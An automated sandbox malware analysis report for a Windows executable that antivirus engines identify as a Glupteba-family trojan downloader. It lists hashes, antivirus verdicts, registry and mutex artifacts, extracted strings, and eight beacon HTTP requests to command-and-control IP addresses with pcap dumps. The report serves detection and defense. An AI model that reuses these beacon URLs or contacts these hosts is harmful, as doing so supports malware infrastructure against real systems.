Analysis Date2015-05-22 21:56:45
MD5efdf947f402ece53364e53cee6ee64bb
SHA12c284748ff2402a1d4599ecc09fcd5ca138a9b1c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 57e03d50ce8154e13a29255ded21c8ea sha1: aa0787e6fc24f7c54f0a08374d5c3a73ba162940 size: 94208
Section.rdata md5: 6b73676a425296b9bd99328854a74fd2 sha1: b02928c02f32b79ef7738dc69f479d701f68736e size: 40960
Section.data md5: de445c93a1569220532eb7f7509d7a61 sha1: cb126f05a84e2b273471d37e2127814a2056383e size: 8192
Section.rsrc md5: 1ad28b7c349d582a692215964a153602 sha1: 9f19ca7ca3ad5546f60a70fdfdc1bbb6ed2c3c41 size: 4096
Timestamp2015-01-19 16:05:53
VersionLegalCopyright: activation
InternalName: carrion
FileVersion: 37, 165, 179, 177
CompanyName: COMARCH SA
PrivateBuild: cleanness
LegalTrademarks: bestowal
Comments: collisions
ProductName: cartel
SpecialBuild: woodshed
ProductVersion: 214, 108, 190, 108
FileDescription: carnally caretaker commenting
OriginalFilename: accomplishes.exe
PackerMicrosoft Visual C++ v6.0
PEhash421c5cf6be9216657a2f1eef2ed12786296cdbfa
IMPhash52f070e0f577b9736e940d517e2474ab
AVArcabit (arcavir)Gen:Variant.Graftor.181076
AVAuthentiumNo Virus
AVGrisoft (avg)Error Scanning File
AVAvira (antivir)TR/Glupteba.151552
AVAlwil (avast)Malware-gen
AVAlwil (avast)Win32:Malware-gen
AVAd-AwareGen:Variant.Graftor.181076
AVBitDefenderGen:Variant.Graftor.181076
AVBullGuardGen:Variant.Graftor.181076
AVClamAVNo Virus
AVDr. WebTrojan.DownLoad3.35231
AVEmsisoftGen:Variant.Graftor.181076
AVMicroWorld (escan)Gen:Variant.Graftor.181076
AVCA (E-Trust Ino)Gen:Variant.Graftor.181076
AVFortinetW32/Deshacop.XO!tr
AVFrisk (f-prot)No Virus
AVF-SecureGen:Variant.Graftor.181076
AVIkarusTrojan.Win32.Glupteba
AVK7Error Scanning File
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeNo Virus
AVMicrosoft Security EssentialsTrojan:Win32/Bulta!rfn
AVNANOTrojan.Win32.Glupteba.dmxfyl
AVEset (nod32)Win32/Glupteba.M
AVPadvishNo Virus
AVCAT (quickheal)No Virus
AVRisingNo Virus
AV360 SafeNo Virus
AVSUPERAntiSpywareNo Virus
AVSymantecDownloader
AVTrend MicroNo Virus
AVTwisterW32.Glupteba.M.gkon
AVVirusBlokAda (vba32)TrojanDownloader.Goo
AVWindows DefenderTrojan:Win32/Bulta!rfn
AVZillya!No Virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
15150115\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://199.173.225.5:35979/stat?uid=100&downlink=1111&uplink=1111&id=0001685A&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://213.171.199.63:28062/stat?uid=100&downlink=1111&uplink=1111&id=00017C3F&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://94.242.250.32:32048/stat?uid=100&downlink=1111&uplink=1111&id=00018FD7&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://83.222.2.212:28644/stat?uid=100&downlink=1111&uplink=1111&id=0001A38E&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://94.232.172.134:36822/stat?uid=100&downlink=1111&uplink=1111&id=0001B725&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://69.17.223.12:49116/stat?uid=100&downlink=1111&uplink=1111&id=0001CACD&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://74.86.58.192:15120/stat?uid=100&downlink=1111&uplink=1111&id=0001DE74&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
HTTP GEThttp://37.46.194.35:10934/stat?uid=100&downlink=1111&uplink=1111&id=0001F21B&statpass=bpass&version=15150115&features=30&guid=ab1040c2-1d24-488a-b96d-92729e965e33&comment=15150115&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 199.173.225.5:35979
Flows TCP192.168.1.1:1031 ➝ 199.173.225.5:35979
Flows TCP192.168.1.1:1032 ➝ 213.171.199.63:28062
Flows TCP192.168.1.1:1033 ➝ 94.242.250.32:32048
Flows TCP192.168.1.1:1034 ➝ 83.222.2.212:28644
Flows TCP192.168.1.1:1035 ➝ 94.232.172.134:36822
Flows TCP192.168.1.1:1036 ➝ 69.17.223.12:49116
Flows TCP192.168.1.1:1037 ➝ 74.86.58.192:15120
Flows TCP192.168.1.1:1038 ➝ 37.46.194.35:10934

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 38354126 73746174 70617373   001685A&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303137 43334626 73746174 70617373   0017C3F&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303138 46443726 73746174 70617373   0018FD7&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303141 33384526 73746174 70617373   001A38E&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303142 37323526 73746174 70617373   001B725&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303143 41434426 73746174 70617373   001CACD&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303144 45373426 73746174 70617373   001DE74&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303146 32314226 73746174 70617373   001F21B&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31313526 66656174 75726573   5150115&features
0x00000060 (00096)   3d333026 67756964 3d616231 30343063   =30&guid=ab1040c
0x00000070 (00112)   322d3164 32342d34 3838612d 62393664   2-1d24-488a-b96d
0x00000080 (00128)   2d393237 32396539 36356533 3326636f   -92729e965e33&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 31352670   mment=15150115&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..


Strings
.
.
.
]0

040904b0
214, 108, 190, 108
37, 165, 179, 177
accomplishes.exe
activation
bestowal
carnally caretaker commenting
carrion
cartel
cleanness
collisions
COMARCH SA
Comments
CompanyName
FileDescription
FileVersion
InternalName
jjjh
LegalCopyright
LegalTrademarks
OriginalFilename
PrivateBuild
ProductName
ProductVersion
SpecialBuild
StringFileInfo
VS_VERSION_INFO
woodshed
zGu3U
";*&*<
/(<	?'0
,3[~,2
!/4*&7#
!:+(68
73#14'
8+'183
	A1mU@
_acmdln
_adjust_fdiv
AdmWSby
AdRybrn
aECGUvOEp
AgnAAfNiFXr
AhLOmOJfY
aiauaGBV
aIudSFJoF
AJjXRC
AlphaBlend
AMOyugvQWa
AQLGYOIy
asDCeHTd
AUqtng
auxGetDevCapsA
auxGetDevCapsW
auxGetNumDevs
auxGetVolume
auxOutMessage
auxSetVolume
AYtlFjQSXM
BbmYVdo
bGofRqJ
BindMoniker
blinding
BnDDGJ
bPNjHogi
bqNCvgoblme
bqUDwovNqHQ
bqXhrKPKP
bRbK*M
btMcWCL
btNTKuXyf
burStjWbeTv
BVOcip
bVwfqWXk
BxFXfJUKxXC
bxKeKCu
CBlgEhCKlSq
CDBQpK
CFsPEfAC
cftKRXCvi
ChangeMenuW
CharNextA
CharUpperA
CheckDlgButton
ChooseColorA
ChooseFontA
ChooseFontW
ckAJqf
CloseDriver
CLSIDFromString
CoAddRefServerProcess
CoGetMalloc
CoIsHandlerConnected
CoLockObjectExternal
CoMarshalInterThreadInterfaceInStream
COMCTL32.dll
comdlg32.dll
CommDlgExtendedError
CommitUrlCacheEntryA
CommitUrlCacheEntryW
_controlfp
CoRegisterClassObject
CoRegisterPSClsid
CreateFontA
CreateILockBytesOnHGlobal
CreatePatternBrush
CreateStatusWindowW
CreateToolbarEx
CreateUrlCacheEntryA
CreateUrlCacheEntryW
CreateUrlCacheGroup
CreateWindowStationW
cUcdws
cUKPitku
cxuQvUSIGSg
cYpgXXSCQ
Cywojf
@.data
dBAenTqqh
DbfpCKFe
DdeReconnect
DefDriverProc
DehfiIPS
DeleteUrlCacheEntry
DeleteUrlCacheGroup
DestroyPropertySheetPage
DfQxChJ
dQEQvkNUCX
DragDetect
DragQueryFileA
DrawFocusRect
DrawStatusTextW
~dW.6 
dXSYnmlnc
ECkeGvSK
efEvVkdlio
eFfaxUopdq
eLUIPQlerHR
eUnvPwDRBo
euotRY
_except_handler3
ExcludeClipRect
eXdjxoUT
ExtCreateRegion
ExtFloodFill
ExtractAssociatedIconW
ExtractIconA
ExtractIconExW
ExtractIconW
FAMiEDSmwYU
FARDrB
FdiCChOnt
FhGkoRPsm
fhoplrQ
fhWJxsbOcvs
FindCloseUrlCache
FindDebugInfoFile
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryExA
FindFirstUrlCacheEntryExW
FindFirstUrlCacheEntryW
FindNextUrlCacheEntryExA
FindNextUrlCacheEntryExW
FindTextA
FindTextW
FjRjLKwGhK
FlatSB_EnableScrollBar
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_GetScrollProp
FlatSB_GetScrollRange
FlatSB_SetScrollInfo
F	NF5 %
fOUYCLKsJFN
Fpk),Z?
fsKKKdcEFBS
FThjFNQJt
FtpCreateDirectoryA
FtpDeleteFileA
FtpDeleteFileW
FtpFindFirstFileA
FtpFindFirstFileW
FtpGetCurrentDirectoryA
FtpGetCurrentDirectoryW
FtpGetFileA
FtpGetFileW
FtpOpenFileW
FtpPutFileA
FtpPutFileW
FtpRemoveDirectoryA
FtpRemoveDirectoryW
FtpRenameFileA
FtpRenameFileW
FtpSetCurrentDirectoryA
FYXDrXQmv
gccvGXmmeuu
GDI32.dll
GetClassWord
GetDIBits
GetFileTitleA
GetHGlobalFromILockBytes
__getmainargs
GetMenuItemRect
GetModuleHandleA
GetSaveFileNameW
GetStartupInfoA
GetTimestampForLoadedLibrary
GetUrlCacheEntryInfoA
GetUrlCacheEntryInfoExA
GetUrlCacheEntryInfoExW
GetUrlCacheEntryInfoW
GFiDMu
gfRKxyOP
giUAPqOJh
}gL	b L3E>
gmdgFdbcbe
gncmngocgr
GNIhHu
GopherCreateLocatorA
GopherCreateLocatorW
GopherFindFirstFileW
GopherGetAttributeA
GopherGetAttributeW
GopherGetLocatorTypeA
GopherGetLocatorTypeW
GopherOpenFileA
GopherOpenFileW
GOuSRi
GradientFill
GtbuRcu
gTGmxD
gVVbijMWOBn
GwPvOeG
hAVSPRrx
HaxLPpxHPql
HEseKPGHc
HGLOBAL_UserUnmarshal
hGuvHxb
hhJrJmHNSs
HKymSMq
HlLgGSAy
hmiWNusYokB
HNlYSTy
HttpAddRequestHeadersA
HttpAddRequestHeadersW
HttpEndRequestA
HttpEndRequestW
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HWND_UserFree
HwUFScOAHhM
HXmjtele
/.	hZ_
IhHpHlyxGL
iieBwJqHlMF
iiyltRs
ImageDirectoryEntryToData
ImageEnumerateCertificates
ImageGetCertificateHeader
ImagehlpApiVersion
IMAGEHLP.dll
ImageList_Copy
ImageList_Destroy
ImageList_DragEnter
ImageList_DrawEx
ImageList_GetDragImage
ImageList_GetIconSize
ImageList_GetImageInfo
ImageList_Merge
ImageList_Remove
ImageList_SetBkColor
ImageList_Write
ImageLoad
IMM32.dll
ImmAssociateContext
ImmConfigureIMEA
ImmConfigureIMEW
ImmCreateContext
ImmDestroyContext
ImmEnumRegisterWordA
ImmEnumRegisterWordW
ImmEscapeW
ImmGetCandidateListA
ImmGetCandidateListCountA
ImmGetCandidateListW
ImmGetCandidateWindow
ImmGetCompositionFontW
ImmGetCompositionStringA
ImmGetCompositionStringW
ImmGetCompositionWindow
ImmGetContext
ImmGetConversionListA
ImmGetConversionListW
ImmGetDescriptionW
ImmGetGuideLineW
ImmGetIMEFileNameA
ImmGetIMEFileNameW
ImmGetOpenStatus
ImmGetVirtualKey
ImmInstallIMEA
ImmInstallIMEW
ImmIsIME
ImmIsUIMessageA
ImmRegisterWordA
ImmRegisterWordW
ImmReleaseContext
ImmSetCandidateWindow
ImmSetCompositionFontA
ImmSetCompositionFontW
ImmSetCompositionStringA
ImmSetCompositionStringW
ImmSetStatusWindowPos
ImmUnregisterWordW
InitCommonControlsEx
_initterm
InternetAutodial
InternetAutodialHangup
InternetCanonicalizeUrlA
InternetCanonicalizeUrlW
InternetCheckConnectionA
InternetCheckConnectionW
InternetCloseHandle
InternetCombineUrlA
InternetCombineUrlW
InternetConfirmZoneCrossing
InternetConnectA
InternetConnectW
InternetCrackUrlA
InternetCreateUrlA
InternetCreateUrlW
InternetDial
InternetErrorDlg
InternetFindNextFileA
InternetFindNextFileW
InternetGetConnectedState
InternetGetCookieA
InternetGetCookieW
InternetGetLastResponseInfoA
InternetGetLastResponseInfoW
InternetGoOnline
InternetHangUp
InternetLockRequestFile
InternetOpenA
InternetOpenUrlA
InternetOpenUrlW
InternetOpenW
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetReadFileExW
InternetSetCookieA
InternetSetCookieW
InternetSetFilePointer
InternetSetOptionExW
InternetSetStatusCallback
InternetTimeFromSystemTime
InternetUnlockRequestFile
InternetWriteFile
iNuaIbj
iQXRApB
IwaPNRU
IXmsQePXcxe
ixWHStvw
I|YZ/jP
JbFKXWWbgHs
jeKUfRtccvT
 ji!1>
JIdmnHLwr
JnEqwaPtXRO
jOohhW
joyGetDevCapsA
joyGetNumDevs
joyGetPos
joyGetThreshold
joyReleaseCapture
joySetCapture
joySetThreshold
JPHESrpmXAb
jpXrHJCBR
jrgPDxhk
JteEJGMPVym
kBwhOcvhBJB
kclfjb
KDulukt
KERNEL32.dll
KethYg
kLGQkHaxyRx
koYAeH
kspXGQQY
Ky^SI+
/`L'@"1q
lCkfKCQDR
LfvUmrq
lhDcnrnmFt
LHEefWqbuF
lLvdnFF
lobGdW
LOreTcG
lqdCVC
LQnElLO
LTpKgQuDd
L<}V<?
lvNsHh
lXfOHBTRLYQ
l}y]c~p
MapVirtualKeyExA
MapVirtualKeyW
mciGetDeviceIDA
mciGetDeviceIDFromElementIDA
mciGetDeviceIDFromElementIDW
mciGetErrorStringA
mciGetYieldProc
mciSendStringA
mciSendStringW
MessageBoxExW
mFnrXNEmtq
midiInGetDevCapsA
midiInGetErrorTextW
midiInGetNumDevs
midiInMessage
midiInPrepareHeader
midiInStart
midiInUnprepareHeader
midiOutCachePatches
midiOutClose
midiOutGetDevCapsW
midiOutGetErrorTextA
midiOutGetErrorTextW
midiOutGetID
midiOutGetVolume
midiOutLongMsg
midiOutMessage
midiOutPrepareHeader
midiOutSetVolume
midiOutShortMsg
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamPause
midiStreamPosition
midiStreamProperty
midiStreamRestart
mixerGetControlDetailsA
mixerGetDevCapsW
mixerGetID
mixerGetLineControlsA
mixerGetLineInfoA
mixerGetLineInfoW
mixerMessage
>mjn#*>5
*M:J:R
MkJbTccdPW
mmioAdvance
mmioAscend
mmioClose
mmioCreateChunk
mmioFlush
mmioInstallIOProcW
mmioOpenA
mmioRenameA
mmioRenameW
mmioSeek
mmioWrite
mMnBVtrntWP
MnveITCbMjC
MPR.dll
MqawDtaDyDB
MSIMG32.dll
MSVCRT.dll
MultinetGetConnectionPerformanceW
mwRLLgpLJc
mWsWvxC
nACgoHCIWg
NbtTyH
NDdeApi.dll
nFXRyjFEY
|~`*ng=
niOjGN
nKiMyv
NnEWnkgpdnY
nOsuqydTrI
nsJBADDJoa
NSSXxjR
nUKqPyqme
nvaxQCBjO
nxpLVWTHxf
oaE+Ki
OAwdbqNkr
oAYBwK
OcaKrKjjn
oExMPfQ
OgBjSAOBjEH
oHAWpcRpsic
OHQFpWuL
oJJKUImRld
OkfsXdOrr
ole32.dll
OLEAUT32.dll
OleCreateLinkToFileEx
OleCreateMenuDescriptor
OleDestroyMenuDescriptor
OleDraw
OleIsRunning
OleLoad
OleNoteObjectVisible
OleSetMenuDescriptor
OMKNXGgM
OpenDriver
OrEJsxQ
ovbKveMPi
OWnaNeUsr
owWcTJSduS
PackDDElParam
PageSetupDlgA
PageSetupDlgW
PCDCcHTVj
__p__commode
pcwUYQvGVEJ
pCYdCpuSRi
pEEIXhwj
__p__fmode
PIdPnv
PjGvRtRkMFM
PkhxfL
PlaySoundA
PlQXQLNV
PolyBezierTo
poMXiS
ppsVMdjiHM
PqSAyFxGCuE
PrintDlgA
PrintDlgW
PropertySheetA
PropVariantClear
PseXSYA
pTLuEuYU
PW^^'Tg@
pxrkuXluWfS
pXSSFMcD
QbUvahKbKA
QClnsxps
QIddxr
QiNNrGfSdp
QjPyfFWW
qlUWVaJnt
qnSPEConxV
Qnyrbcq
qRorCSiOhRq
QruQsrTlSu
QsNbGSH
QVtVrRXb
QVUYgNmB
r4;akA
RafyaQgPmC
RArhRv
`.rdata
ReadUrlCacheEntryStream
ReBaseImage
ReleaseDC
RemovePrivateCvSymbolic
RemoveRelocations
ReplaceTextA
ReplaceTextW
RestoreDC
RetrieveUrlCacheEntryFileA
RetrieveUrlCacheEntryFileW
RetrieveUrlCacheEntryStreamA
RetrieveUrlCacheEntryStreamW
RGylCBpiNO
RhFGajFBhM
R`h{Nnh
rhPrpXWRx
R`hRich
R`h@Tfh
R`huR`h
$)R#,L
ROKvYcl
rorylD
RqoSfJyL
r*QX _
scHKUlNp
SDgNDywq
SearchTreeForFile
SendDriverMessage
__set_app_type
SetMenuItemInfoA
SetTextJustification
SetupAddInstallSectionToDiskSpaceListW
SetupAdjustDiskSpaceListW
SETUPAPI.dll
SetupCopyErrorW
SetupCopyOEMInfA
SetupDefaultQueueCallbackA
SetupDestroyDiskSpaceList
SetupDiBuildClassInfoList
SetupDiCallClassInstaller
SetupDiClassGuidsFromNameW
SetupDiClassNameFromGuidExA
SetupDiCreateDeviceInfoA
SetupDiCreateDeviceInfoListExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiDeleteDeviceInterfaceRegKey
SetupDiDestroyClassImageList
SetupDiDestroyDriverInfoList
SetupDiEnumDeviceInfo
SetupDiEnumDriverInfoA
SetupDiGetClassDescriptionA
SetupDiGetClassDevPropertySheetsA
SetupDiGetClassDevsExW
SetupDiGetClassImageListExA
SetupDiGetDeviceInfoListClass
SetupDiGetDeviceInfoListDetailA
SetupDiGetDeviceInterfaceDetailA
SetupDiGetINFClassW
SetupDiInstallClassA
SetupDiInstallClassW
SetupDiOpenClassRegKey
SetupDiOpenDeviceInterfaceA
SetupDiOpenDeviceInterfaceRegKey
SetupDiRegisterCoDeviceInstallers
SetupDiSetDriverInstallParamsW
SetupFreeSourceListW
SetupGetFileCompressionInfoW
SetupGetInfFileListA
SetupGetInfInformationA
SetupGetLineByIndexW
SetupGetLineTextA
SetupGetSourceFileSizeW
SetupGetSourceInfoA
SetupGetStringFieldA
SetupGetTargetPathA
SetupInitDefaultQueueCallbackEx
SetupInstallFromInfSectionA
SetupInstallServicesFromInfSectionExA
SetupInstallServicesFromInfSectionExW
SetupInstallServicesFromInfSectionW
SetupIterateCabinetA
SetupIterateCabinetW
SetupOpenInfFileW
SetupQueryFileLogA
SetupQueryInfFileInformationA
SetupQueueRenameW
SetupRemoveInstallSectionFromDiskSpaceListA
SetupScanFileQueueA
SetupSetDirectoryIdExA
SetupSetDirectoryIdW
SetUrlCacheEntryInfoA
SetUrlCacheEntryInfoW
__setusermatherr
SetUserObjectInformationA
SetWinMetaFileBits
sfdEFeQD
SFyEHTXWcw
shABvCgx
SHELL32.dll
SHEmptyRecycleBinW
SHFileOperationA
SHGetDataFromIDListA
SHGetFileInfoA
SHGetSpecialFolderLocation
SHQueryRecycleBinA
SjTBSdxSFL
s;JTg#
*s@JW4V
sLwnSYD
SMjfhpHxEK
sndPlaySoundA
SnhGYJWeO
SRiIDir
sSwAaX
StgGetIFillLockBytesOnFile
STGMEDIUM_UserFree
StgOpenStorageOnILockBytes
StgSetTimes
StIGDs
stYDIa
SymCleanup
SymEnumerateSymbols
SymGetLineFromAddr
SymGetModuleInfo
SymGetSearchPath
SymGetSymFromAddr
SymGetSymPrev
SymSetSearchPath
tfqWygY
!This program cannot be run in DOS mode.
thnCVIc
timeBeginPeriod
timeKillEvent
timeSetEvent
TLHSwLhTSF
TNQqOKji
_TrackMouseEvent
transient
tTLNeyuXWy
TtvSfKqwMCf
tUmTbO
TXeVfL
uabvxqmoKG
uaDHPhW
uhCxfXrAsFe
UirgcnYH
UjLTEVGSie
UJObtnrqs
ukMdYnkTIc
UKoiPdGtCLJ
ulaGPqbyUid
UninitializeFlatSB
UnlockUrlCacheEntryFile
UnlockUrlCacheEntryStream
uOBlvU
UoeDYx
UOiBCPew
uPbuVl
URfRdCNnT
USER32.dll
uWCdbIsUF
UXLnhm
VFaJnIW
VGvrqlNDsEf
vodIbcM
vPHWMuih
vrAAciQ
vsDYNV
vvKrOsJWS
vWrTzc
vxUAGSFw
vYiOQr
VYpGEgWGw
waveInAddBuffer
waveInClose
waveInGetDevCapsA
waveInGetDevCapsW
waveInGetErrorTextA
waveInGetID
waveInOpen
waveInReset
waveInStop
waveInUnprepareHeader
waveOutGetDevCapsA
waveOutGetErrorTextA
waveOutGetID
waveOutGetNumDevs
waveOutGetPitch
waveOutGetVolume
waveOutMessage
waveOutOpen
waveOutPrepareHeader
waveOutSetPitch
waveOutWrite
WcEsqRhK
wDRgbsYg
wEUNYnpP
WININET.dll
WINMM.dll
WiUxnQ
wKHFrINmgQ
wKOtKEEfK
WNetAddConnection3A
WNetAddConnectionW
WNetCancelConnection2A
WNetCancelConnection2W
WNetConnectionDialog1W
WNetDisconnectDialog
WNetDisconnectDialog1A
WNetDisconnectDialog1W
WNetGetLastErrorW
WNetGetNetworkInformationA
WNetGetNetworkInformationW
WNetGetProviderNameW
WNetGetUniversalNameW
WNetGetUserW
WNetOpenEnumA
WNetUseConnectionA
WpQfmw
WpRaliPegrv
wqP1d2
XaaI.J
XbdhoWqy
xBmKToEtF
_XcptFilter
XJTEWlbNLV
XkhnnVfG
xpATDNX
XRtnClvRKBs
XuGwwa
xvyhlwssX
XwcXFA
XwXjWOJWDsj
yDSSCMdj
yoJFEGuw
ywPSqm
zk\Lm&N8